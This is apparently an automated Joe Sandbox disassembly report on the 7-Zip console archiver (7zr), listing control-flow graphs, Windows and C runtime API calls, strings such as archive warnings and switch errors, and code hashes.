566 1b9c56-1b9c69 560->566 561->566 566->554 566->555 583 1b9e83-1b9f06 call 1bbde4 fputs call 181fa0 572->583 573->583 586 1b9f41-1b9f9d call 1bb650 call 1bb5e9 call 1bbde4 fputs call 181fa0 579->586 584 1bac3a-1bac66 call 1bb96d call 181e40 call 1a3247 580->584 585 1bac2c-1bac33 580->585 583->556 583->558 616 1bac68-1bac6a 584->616 617 1bac6e-1bacb5 call 181e40 call 1811c2 call 1bbe0c call 1b2db9 584->617 585->584 588 1bac35 call 1bb988 585->588 661 1b9f9f 586->661 588->584 599 1b9cb9-1b9cbc call 18315e 591->599 600 1b9cc1-1b9cdd call 1831e5 591->600 619 1b9d4b-1b9d53 592->619 620 1b9d2a-1b9d4a fputs call 1821d8 592->620 599->600 613 1b9cdf-1b9d00 call 183221 call 1831e5 call 181089 600->613 614 1b9d05-1b9d0e 600->614 613->614 614->591 614->592 616->617 622 1b9d59-1b9d5d 619->622 623 1b9dff-1b9e1f call 181fa0 call 181e40 619->623 620->619 629 1b9d5f-1b9d6d fputs 622->629 630 1b9d6e-1b9d82 622->630 623->539 623->540 629->630 638 1b9df0-1b9df9 630->638 639 1b9d84-1b9d88 630->639 638->622 638->623 644 1b9d8a-1b9d94 639->644 645 1b9d95-1b9d9f 639->645 644->645 651 1b9da1-1b9da3 645->651 652 1b9da5-1b9db1 645->652 651->652 658 1b9dd8-1b9dee 651->658 659 1b9db8 652->659 660 1b9db3-1b9db6 652->660 658->638 658->639 664 1b9dbb-1b9dce 659->664 660->664 661->580 670 1b9dd0-1b9dd3 664->670 671 1b9dd5 664->671 670->658 671->658
                          APIs
                            • Part of subcall function 001BB5B1: fputs.MSVCRT ref: 001BB5CA
                            • Part of subcall function 001BB5B1: fputs.MSVCRT ref: 001BB5E1
                          • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?), ref: 001B99BD
                          • GetConsoleScreenBufferInfo.KERNELBASE(00000000,?,?,?,?,?,?), ref: 001B99C4
                          • _CxxThrowException.MSVCRT(?,002355B8), ref: 001B9A77
                          • _CxxThrowException.MSVCRT(?,002355B8), ref: 001B9ABB
                            • Part of subcall function 00181FB3: __EH_prolog.LIBCMT ref: 00181FB8
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: ExceptionThrowfputs$BufferConsoleH_prologHandleInfoScreen
                          • String ID: $ || $Codecs:$Formats:$Hashers:$KSNFMGOPBELHXCc+a+m+r+$P$offset=$p&$$p&$$N
                          • API String ID: 377453556-1899429407
                          • Opcode ID: f6ea03c2ffb154f3463cd11549a91a4c18e5241a13cbb31f77d59dd05142add9
                          • Instruction ID: 80a05a374cb94bc8dfdfc255b8a5db8ee0d2d94d1efbc74489d1ee08524004e9
                          • Opcode Fuzzy Hash: f6ea03c2ffb154f3463cd11549a91a4c18e5241a13cbb31f77d59dd05142add9
                          • Instruction Fuzzy Hash: 52229F71D00208DFDF15EFA4D886BEDBBB1EF58310F20005AE645A7292CB359A96CF61

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 672 191ade-191b14 call 21fb10 call 1813f5 677 191b32-191b8b _fileno _isatty _fileno _isatty _fileno _isatty 672->677 678 191b16-191b2d call 1a1d73 _CxxThrowException 672->678 679 191b9d-191b9f 677->679 680 191b8d-191b91 677->680 678->677 684 191ba0-191bcd 679->684 680->679 683 191b93-191b97 680->683 683->679 685 191b99-191b9b 683->685 686 191bf9-191c12 684->686 687 191bcf-191bf8 call 191ea4 call 1827bb call 181e40 684->687 685->684 689 191c20 686->689 690 191c14-191c18 686->690 687->686 692 191c27-191c2b 689->692 690->689 691 191c1a-191c1e 690->691 691->689 691->692 694 191c2d 692->694 695 191c34-191c3e 692->695 694->695 697 191c49-191c53 695->697 698 191c40-191c43 695->698 700 191c5e-191c68 697->700 701 191c55-191c58 697->701 698->697 703 191c6a-191c6d 700->703 704 191c73-191c79 700->704 701->700 703->704 706 191cc9-191cd2 704->706 707 191c7b-191c87 704->707 708 191cea call 191eb9 706->708 709 191cd4-191ce6 706->709 710 191c89-191c93 707->710 711 191c95-191ca1 call 191ed1 707->711 714 191cef-191cf8 708->714 709->708 710->706 716 191cc0-191cc3 711->716 717 191ca3-191cbb call 1a1d73 _CxxThrowException 711->717 718 191cfa-191d0a 714->718 719 191d37-191d40 714->719 716->706 717->716 723 191d10 718->723 724 191dc2-191dd4 wcscmp 718->724 721 191e93-191ea1 719->721 722 191d46-191d52 719->722 722->721 728 191d58-191d93 call 1826dd call 18280c call 183221 call 183bbf 722->728 727 191d17-191d1f call 189399 723->727 726 191dda-191de6 call 191ed1 724->726 724->727 726->727 735 191dec-191e04 call 1a1d73 _CxxThrowException 726->735 727->719 737 191d21-191d32 call 206a60 call 189313 727->737 757 191d9f-191da3 728->757 758 191d95-191d9c 728->758 745 191e09-191e0c 735->745 737->719 748 191e0e 745->748 749 191e31-191e4a call 191f0c GetCurrentProcess SetProcessAffinityMask 745->749 752 191e10-191e12 748->752 753 191e14-191e2c call 1a1d73 _CxxThrowException 748->753 760 191e4c-191e82 GetLastError call 183221 call 1858a9 call 1831e5 call 181e40 749->760 761 191e83-191e92 call 183172 call 181e40 749->761 752->749 752->753 753->749 757->745 759 191da5-191dbd call 1a1d73 _CxxThrowException 757->759 758->757 759->724 760->761 761->721
                          APIs
                          • __EH_prolog.LIBCMT ref: 00191AE3
                            • Part of subcall function 001813F5: __EH_prolog.LIBCMT ref: 001813FA
                          • _CxxThrowException.MSVCRT(?,00236010), ref: 00191B2D
                          • _fileno.MSVCRT ref: 00191B3E
                          • _isatty.MSVCRT ref: 00191B47
                          • _fileno.MSVCRT ref: 00191B5D
                          • _isatty.MSVCRT ref: 00191B60
                          • _fileno.MSVCRT ref: 00191B73
                          • _CxxThrowException.MSVCRT(?,00236010), ref: 00191CBB
                          • _CxxThrowException.MSVCRT(?,00236010), ref: 00191DBD
                          • wcscmp.MSVCRT ref: 00191DCA
                          • _CxxThrowException.MSVCRT(?,00236010), ref: 00191E04
                          • _isatty.MSVCRT ref: 00191B76
                            • Part of subcall function 001A1D73: __EH_prolog.LIBCMT ref: 001A1D78
                          • _CxxThrowException.MSVCRT(?,00236010), ref: 00191E2C
                          • GetCurrentProcess.KERNEL32(00000000,00000000,?,Set process affinity mask: ,?), ref: 00191E3B
                          • SetProcessAffinityMask.KERNEL32(00000000), ref: 00191E42
                          • GetLastError.KERNEL32(?,Set process affinity mask: ,?), ref: 00191E4C
                          Strings
                          • SeLockMemoryPrivilege, xrefs: 00191D28
                          • : ERROR : , xrefs: 00191E52
                          • Set process affinity mask: , xrefs: 00191D74
                          • unsupported value -stm, xrefs: 00191E19
                          • Unsupported switch postfix -bb, xrefs: 00191CA8
                          • Unsupported switch postfix for -slp, xrefs: 00191DF1
                          • Unsupported switch postfix -stm, xrefs: 00191DAA
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: ExceptionThrow$H_prolog_fileno_isatty$Process$AffinityCurrentErrorLastMaskwcscmp
                          • String ID: : ERROR : $SeLockMemoryPrivilege$Set process affinity mask: $Unsupported switch postfix -bb$Unsupported switch postfix -stm$Unsupported switch postfix for -slp$unsupported value -stm
                          • API String ID: 1826148334-1115009270
                          • Opcode ID: 91cbcf67f0ee41d87e67c51718dfd1830b0fc3931a32515a17d5ab9725dcca3e
                          • Instruction ID: 52c9b2db91bac959ab09092ac4e5b9574d25a7aefadb18ca8e5207a437b77d75
                          • Opcode Fuzzy Hash: 91cbcf67f0ee41d87e67c51718dfd1830b0fc3931a32515a17d5ab9725dcca3e
                          • Instruction Fuzzy Hash: D2C1D231900246BFDF22EFB8C889BDDBBF5BF19304F148459E49997292C774AA95CB10

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 777 1b8012-1b8032 call 21fb10 780 1b8038-1b806c fputs call 1b8341 777->780 781 1b8285 777->781 785 1b80c8-1b80cd 780->785 786 1b806e-1b8071 780->786 782 1b8287-1b8295 781->782 787 1b80cf-1b80d4 785->787 788 1b80d6-1b80df 785->788 789 1b808b-1b808d 786->789 790 1b8073-1b8089 fputs call 181fa0 786->790 791 1b80e2-1b8110 call 1b8341 call 1b8622 787->791 788->791 793 1b808f-1b8094 789->793 794 1b8096-1b809f 789->794 790->785 805 1b811e-1b812f call 1b8565 791->805 806 1b8112-1b8119 call 1b831f 791->806 797 1b80a2-1b80c7 call 182e47 call 1b85c6 call 181e40 793->797 794->797 797->785 805->782 812 1b8135-1b813f 805->812 806->805 813 1b814d-1b815b 812->813 814 1b8141-1b8148 call 1b82bb 812->814 813->782 817 1b8161-1b8164 813->817 814->813 818 1b81b6-1b81c0 817->818 819 1b8166-1b8186 817->819 820 1b8276-1b827f 818->820 821 1b81c6-1b81e1 fputs 818->821 824 1b8298-1b829d 819->824 825 1b818c-1b8196 call 1b8565 819->825 820->780 820->781 821->820 826 1b81e7-1b81fb 821->826 827 1b82b1-1b82b9 SysFreeString 824->827 831 1b819b-1b819d 825->831 829 1b81fd-1b821f 826->829 830 1b8273 826->830 827->782 834 1b829f-1b82a1 829->834 835 1b8221-1b8245 829->835 830->820 831->824 832 1b81a3-1b81b4 SysFreeString 831->832 832->818 832->819 836 1b82ae 834->836 838 1b82a3-1b82ab call 18965d 835->838 839 1b8247-1b8271 call 1b84a7 call 18965d SysFreeString 835->839 836->827 838->836 839->829 839->830
                          APIs
                          • __EH_prolog.LIBCMT ref: 001B8017
                          • fputs.MSVCRT ref: 001B804D
                            • Part of subcall function 001B8341: __EH_prolog.LIBCMT ref: 001B8346
                            • Part of subcall function 001B8341: fputs.MSVCRT ref: 001B835B
                            • Part of subcall function 001B8341: fputs.MSVCRT ref: 001B8364
                          • fputs.MSVCRT ref: 001B807A
                            • Part of subcall function 00181FA0: fputc.MSVCRT ref: 00181FA7
                            • Part of subcall function 0018965D: VariantClear.OLEAUT32(?), ref: 0018967F
                          • SysFreeString.OLEAUT32(00000000), ref: 001B81AA
                          • fputs.MSVCRT ref: 001B81CD
                          • SysFreeString.OLEAUT32(00000000), ref: 001B8267
                          • SysFreeString.OLEAUT32(00000000), ref: 001B82B1
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputs$FreeString$H_prolog$ClearVariantfputc
                          • String ID: --$----$Path$Type$Warning: The archive is open with offset
                          • API String ID: 2889736305-3797937567
                          • Opcode ID: 172d1572b538b98de9c60d4ee9794a07a2c76d63c4630dedbdcfbdf7366c7b00
                          • Instruction ID: d55ba6b23ea03a923f4a06db02b213a6ebe6a1d2260d1251663532402c54e14a
                          • Opcode Fuzzy Hash: 172d1572b538b98de9c60d4ee9794a07a2c76d63c4630dedbdcfbdf7366c7b00
                          • Instruction Fuzzy Hash: 75917931A00605EFDB18EFA4DD85AEEB7B9FF58750F204169F412A7291DB70AD05CB60

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 846 1b6766-1b6792 call 21fb10 EnterCriticalSection 849 1b67af-1b67b7 846->849 850 1b6794-1b6799 call 1bc7d7 846->850 852 1b67b9 call 181f91 849->852 853 1b67be-1b67c3 849->853 856 1b679e-1b67ac 850->856 852->853 854 1b67c9-1b67d5 853->854 855 1b6892-1b68a8 853->855 858 1b6817-1b682f 854->858 859 1b67d7-1b67dd 854->859 860 1b68ae-1b68b4 855->860 861 1b6941 855->861 856->849 864 1b6873-1b687b 858->864 865 1b6831-1b6842 call 181fa0 858->865 859->858 862 1b67df-1b67eb 859->862 860->861 863 1b68ba-1b68c2 860->863 866 1b6943-1b695a 861->866 869 1b67ed 862->869 870 1b67f3-1b6801 862->870 867 1b6933-1b693f call 1bc5cd 863->867 871 1b68c4-1b68e6 call 181fa0 fputs 863->871 864->867 868 1b6881-1b6887 864->868 865->864 883 1b6844-1b686c fputs call 182201 865->883 867->866 868->867 873 1b688d 868->873 869->870 870->864 875 1b6803-1b6815 fputs 870->875 885 1b68fb-1b6917 call 194f2a call 181fb3 call 181e40 871->885 886 1b68e8-1b68f9 fputs 871->886 879 1b692e call 181f91 873->879 881 1b686e call 181fa0 875->881 879->867 881->864 883->881 889 1b691c-1b6928 call 181fa0 885->889 886->889 889->879
                          APIs
                          • __EH_prolog.LIBCMT ref: 001B676B
                          • EnterCriticalSection.KERNEL32(00242938), ref: 001B6781
                          • fputs.MSVCRT ref: 001B680B
                          • LeaveCriticalSection.KERNEL32(00242938), ref: 001B6944
                            • Part of subcall function 001BC7D7: fputs.MSVCRT ref: 001BC840
                          • fputs.MSVCRT ref: 001B6851
                            • Part of subcall function 00182201: fputs.MSVCRT ref: 0018221E
                          • fputs.MSVCRT ref: 001B68D9
                          • fputs.MSVCRT ref: 001B68F6
                            • Part of subcall function 00181FA0: fputc.MSVCRT ref: 00181FA7
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputs$CriticalSection$EnterH_prologLeavefputc
                          • String ID: v$8)$$8)$$Sub items Errors:
                          • API String ID: 2670240366-3854986774
                          • Opcode ID: 181bb5e047ed824b455c9e7d7b7deb10f4bdde999027bc68a15164d64f4d0081
                          • Instruction ID: 34a3239608f6fec2b12450b1f93c51650713fd02c0ea9aaaf1680a9482938425
                          • Opcode Fuzzy Hash: 181bb5e047ed824b455c9e7d7b7deb10f4bdde999027bc68a15164d64f4d0081
                          • Instruction Fuzzy Hash: 9F51CE32600700EFCB24AFA4D895AEAB7E2FFA4314F50442EE19A87261CB386D55CF40

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 898 1b6359-1b6373 call 21fb10 901 1b639e-1b63af call 1b5a4d 898->901 902 1b6375-1b6385 call 1bc7d7 898->902 908 1b65ee-1b65f1 901->908 909 1b63b5-1b63cd 901->909 902->901 907 1b6387-1b639b 902->907 907->901 910 1b65f3-1b65fb 908->910 911 1b6624-1b663c 908->911 912 1b63cf 909->912 913 1b63d2-1b63d4 909->913 914 1b66ea call 1bc5cd 910->914 915 1b6601-1b6607 call 1b8012 910->915 916 1b663e call 181f91 911->916 917 1b6643-1b664b 911->917 912->913 918 1b63df-1b63e7 913->918 919 1b63d6-1b63d9 913->919 927 1b66ef-1b66fd 914->927 928 1b660c-1b660e 915->928 916->917 917->914 924 1b6651-1b668f fputs call 18211a call 181fa0 call 1b8685 917->924 925 1b63e9-1b63f2 call 181fa0 918->925 926 1b6411-1b6413 918->926 919->918 923 1b64b1-1b64bc call 1b6700 919->923 947 1b64be-1b64c1 923->947 948 1b64c7-1b64cf 923->948 924->927 981 1b6691-1b6697 924->981 925->926 943 1b63f4-1b640c call 18210c call 181fa0 925->943 929 1b6442-1b6446 926->929 930 1b6415-1b641d 926->930 928->927 934 1b6614-1b661f call 181fa0 928->934 938 1b6448-1b6450 929->938 939 1b6497-1b649f 929->939 935 1b642a-1b643b 930->935 936 1b641f-1b6425 call 1b6134 930->936 934->914 935->929 936->935 949 1b647f-1b6490 938->949 950 1b6452-1b647a fputs call 181fa0 call 181fb3 call 181fa0 938->950 939->923 944 1b64a1-1b64ac call 181fa0 call 181f91 939->944 943->926 944->923 947->948 955 1b65a2-1b65a6 947->955 956 1b64f9-1b64fb 948->956 957 1b64d1-1b64da call 181fa0 948->957 949->939 950->949 964 1b65da-1b65e6 955->964 965 1b65a8-1b65b6 955->965 961 1b652a-1b652e 956->961 962 1b64fd-1b6505 956->962 957->956 986 1b64dc-1b64f4 call 18210c call 181fa0 957->986 974 1b657f-1b6587 961->974 975 1b6530-1b6538 961->975 971 1b6512-1b6523 962->971 972 1b6507-1b650d call 1b6134 962->972 964->909 968 1b65ec 964->968 976 1b65b8-1b65ca call 1b6244 965->976 977 1b65d3 965->977 968->908 971->961 972->971 974->955 980 1b6589-1b6595 call 181fa0 974->980 983 1b653a-1b6562 fputs call 181fa0 call 181fb3 call 181fa0 975->983 984 1b6567-1b6578 975->984 976->977 1001 1b65cc-1b65ce call 181f91 976->1001 977->964 980->955 1003 1b6597-1b659d call 181f91 980->1003 991 1b6699-1b669f 981->991 992 1b66df-1b66e5 call 181f91 981->992 983->984 984->974 986->956 998 1b66b3-1b66ce call 194f2a call 181fb3 call 181e40 991->998 999 1b66a1-1b66b1 fputs 991->999 992->914 1004 1b66d3-1b66da call 181fa0 998->1004 999->1004 1001->977 1003->955 1004->992
                          APIs
                          • __EH_prolog.LIBCMT ref: 001B635E
                          • fputs.MSVCRT ref: 001B645F
                            • Part of subcall function 001BC7D7: fputs.MSVCRT ref: 001BC840
                          • fputs.MSVCRT ref: 001B6547
                          • fputs.MSVCRT ref: 001B665F
                          • fputs.MSVCRT ref: 001B66AE
                            • Part of subcall function 00181F91: fflush.MSVCRT ref: 00181F93
                            • Part of subcall function 00181FB3: __EH_prolog.LIBCMT ref: 00181FB8
                            • Part of subcall function 00181E40: free.MSVCRT ref: 00181E44
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputs$H_prolog$fflushfree
                          • String ID: Can't allocate required memory$ERRORS:$WARNINGS:
                          • API String ID: 1750297421-1898165966
                          • Opcode ID: 66186c7f06c69b1373a62635ff70d16a7cb8f00787b2013bd81247d7e2429988
                          • Instruction ID: 6c9386aa057058c425cb4d604b8d9d63b0d62992d91ca20903d0167b2a39ceb2
                          • Opcode Fuzzy Hash: 66186c7f06c69b1373a62635ff70d16a7cb8f00787b2013bd81247d7e2429988
                          • Instruction Fuzzy Hash: B4B18B31601B019FDB24EF60C9A1BEAB7F2BF64304F04452DE65A87292CB78AD59CF50

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1016 189c8f-189cc2 GetModuleHandleA GetProcAddress 1017 189cef-189d06 GlobalMemoryStatus 1016->1017 1018 189cc4-189ccc GlobalMemoryStatusEx 1016->1018 1019 189d08 1017->1019 1020 189d0b-189d0d 1017->1020 1018->1017 1021 189cce-189cd7 1018->1021 1019->1020 1022 189d11-189d15 1020->1022 1023 189cd9 1021->1023 1024 189ce5 1021->1024 1026 189cdb-189cde 1023->1026 1027 189ce0-189ce3 1023->1027 1025 189ce8-189ced 1024->1025 1025->1022 1026->1024 1026->1027 1027->1025
                          APIs
                          • GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 00189CB3
                          • GetProcAddress.KERNEL32(00000000), ref: 00189CBA
                          • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00189CC8
                          • GlobalMemoryStatus.KERNEL32(?), ref: 00189CFA
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: GlobalMemoryStatus$AddressHandleModuleProc
                          • String ID: $@$GlobalMemoryStatusEx$kernel32.dll
                          • API String ID: 180289352-802862622
                          • Opcode ID: 7037e647b7d56291866f771a204e1dcbf45a5fd70f42e6067fd282fa19418eb8
                          • Instruction ID: 940991f24f0ccaefe6c79266e606da8b8dd0c307ac3d82d2d8372ec802b4991f
                          • Opcode Fuzzy Hash: 7037e647b7d56291866f771a204e1dcbf45a5fd70f42e6067fd282fa19418eb8
                          • Instruction Fuzzy Hash: 211117B0900209ABDF24EFE4E899BADBBF5BF04705F644418E446A7240D779EA84CF54

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1028 1cf1b2-1cf1ce call 21fb10 call 191168 1032 1cf1d3-1cf1d5 1028->1032 1033 1cf36a-1cf378 1032->1033 1034 1cf1db-1cf1e4 call 1cf3e4 1032->1034 1037 1cf1ed-1cf1f2 1034->1037 1038 1cf1e6-1cf1e8 1034->1038 1039 1cf1f4-1cf1f9 1037->1039 1040 1cf203-1cf21a 1037->1040 1038->1033 1039->1040 1041 1cf1fb-1cf1fe 1039->1041 1043 1cf21c-1cf22c _CxxThrowException 1040->1043 1044 1cf231-1cf248 memcpy 1040->1044 1041->1033 1043->1044 1045 1cf24c-1cf257 1044->1045 1046 1cf25c-1cf25e 1045->1046 1047 1cf259 1045->1047 1048 1cf260-1cf26f 1046->1048 1049 1cf281-1cf299 1046->1049 1047->1046 1050 1cf279-1cf27b 1048->1050 1051 1cf271 1048->1051 1057 1cf29b-1cf2a0 1049->1057 1058 1cf311-1cf313 1049->1058 1050->1049 1052 1cf315-1cf318 1050->1052 1054 1cf277 1051->1054 1055 1cf273-1cf275 1051->1055 1056 1cf357-1cf368 1052->1056 1054->1050 1055->1050 1055->1054 1056->1033 1057->1052 1059 1cf2a2-1cf2b5 call 1cf37b 1057->1059 1058->1056 1063 1cf2b7-1cf2cf call 21e1a0 1059->1063 1064 1cf2f0-1cf30c memmove 1059->1064 1067 1cf31a-1cf355 memcpy 1063->1067 1068 1cf2d1-1cf2eb call 1cf37b 1063->1068 1064->1045 1067->1056 1068->1063 1072 1cf2ed 1068->1072 1072->1064
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID: C#$C#
                          • API String ID: 3519838083-2277949161
                          • Opcode ID: 7f6294665eb9d02f9a22bcccf2354bde45e5a56ee20be3687756f866a37e88b4
                          • Instruction ID: e7b9f0bf3bc9ecb01e3dc47a71564157e30d5788ce9f5d2c81a4e41a1d44cbba
                          • Opcode Fuzzy Hash: 7f6294665eb9d02f9a22bcccf2354bde45e5a56ee20be3687756f866a37e88b4
                          • Instruction Fuzzy Hash: B6517076A00205ABDB14DFA4C884FBEB3B6FFA8354F15842DE901A7241D774E946CB60

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: _initterm$__getmainargs__p___initenv__p__commode__p__fmode__set_app_type
                          • String ID:
                          • API String ID: 4012487245-0
                          • Opcode ID: ccad3039bb3a2cd44b6ef38cfe1a5d711a88043cb502be024989bca561bfa4cb
                          • Instruction ID: 8f3c27acc0c8ca9d4a47c2fab01b1bff70b9d9f0cd4e3177029eb1a69cf791e6
                          • Opcode Fuzzy Hash: ccad3039bb3a2cd44b6ef38cfe1a5d711a88043cb502be024989bca561bfa4cb
                          • Instruction Fuzzy Hash: EC215B75910618FFDB249FE4EC4AA9DBBB8FB0AB20F100255F111A22E2C7745565CF60

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: _initterm$FilterXcpt__getmainargs__p___initenv__setusermatherr_controlfpexit
                          • String ID:
                          • API String ID: 279829931-0
                          • Opcode ID: 11c6eee75e368aae7d8cf1334b66372271fac9d1f9bbf5e6b4cee7235e3a970d
                          • Instruction ID: f2497637d397f8bb70fa48770bca89f4f1c8ca38e6623a27e8a715b2fdff53ae
                          • Opcode Fuzzy Hash: 11c6eee75e368aae7d8cf1334b66372271fac9d1f9bbf5e6b4cee7235e3a970d
                          • Instruction Fuzzy Hash: 6E01E975920618EFDB189FE0EC8ACEE7BB9FF0D700B101059F505A2262DB759965CF20

                          Control-flow Graph

                          APIs
                          • __EH_prolog.LIBCMT ref: 001A185D
                            • Part of subcall function 001A021A: __EH_prolog.LIBCMT ref: 001A021F
                            • Part of subcall function 001A062E: __EH_prolog.LIBCMT ref: 001A0633
                          • _CxxThrowException.MSVCRT(?,00236010), ref: 001A1961
                            • Part of subcall function 001A1AA5: __EH_prolog.LIBCMT ref: 001A1AAA
                          Strings
                          • Duplicate archive path:, xrefs: 001A1A8D
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog$ExceptionThrow
                          • String ID: Duplicate archive path:
